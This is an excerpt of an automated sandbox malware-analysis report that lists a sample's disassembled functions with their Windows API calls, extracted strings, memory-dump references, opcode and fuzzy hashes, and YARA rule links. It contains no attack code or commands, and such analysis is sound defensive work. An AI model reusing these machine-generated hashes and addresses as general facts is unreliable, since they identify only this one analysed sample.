                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                                                                                                                                                                            Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                                                                                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                                                                                                                            • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                                                                                                                                                            • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                                                                                                                            • String ID: LPT
                                                                                                                                                                                                                                                            • API String ID: 3035604524-1350329615
                                                                                                                                                                                                                                                            • Opcode ID: 8e2456e5c24cdd82ea1ba0c33fa18974f5c0f42ceb987109207d96c422488140
                                                                                                                                                                                                                                                            • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e2456e5c24cdd82ea1ba0c33fa18974f5c0f42ceb987109207d96c422488140
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                                                                                                                                                                            Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                                                                                                            • String ID: \$h
                                                                                                                                                                                                                                                            • API String ID: 4104443479-677774858
                                                                                                                                                                                                                                                            • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                                                                                                                                            • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                                                                                                                                                                            Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                                            • String ID: &
                                                                                                                                                                                                                                                            • API String ID: 2931989736-1010288
                                                                                                                                                                                                                                                            • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                                                            • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                                                                                                                                                            Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                                                                                                            • String ID: \
                                                                                                                                                                                                                                                            • API String ID: 4104443479-2967466578
                                                                                                                                                                                                                                                            • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                                                                                                                                            • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                                                                                                                                                                            Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                            • String ID: '
                                                                                                                                                                                                                                                            • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                            • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                                                                                                            • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                                                                                                                                                            Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _strlen.LIBCMT ref: 0040F858
                                                                                                                                                                                                                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                                                                                                                                                              • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                                                                                                                                                            • _sprintf.LIBCMT ref: 0040F9AE
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove$_sprintf_strlen
                                                                                                                                                                                                                                                            • String ID: %02X
                                                                                                                                                                                                                                                            • API String ID: 1921645428-436463671
                                                                                                                                                                                                                                                            • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                                                            • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                                                                                                                                                            Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                            • String ID: Combobox
                                                                                                                                                                                                                                                            • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                            • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                                                            • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                                                                                                                                                            Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                                            • String ID: edit
                                                                                                                                                                                                                                                            • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                                            • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                                                                                                            • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                                                                                                                                                            Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                                                                                                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                            • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                            • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                                                                                                            • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                                                                                                                                                            Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: htonsinet_addr
                                                                                                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                                                                                                            • API String ID: 3832099526-2422070025
                                                                                                                                                                                                                                                            • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                                                                                                            • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                                                                                                                                                            Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _memmove
                                                                                                                                                                                                                                                            • String ID: u,D
                                                                                                                                                                                                                                                            • API String ID: 4104443479-3858472334
                                                                                                                                                                                                                                                            • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                                                                                                                                            • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                                                                                                                                                            Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0045612A
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
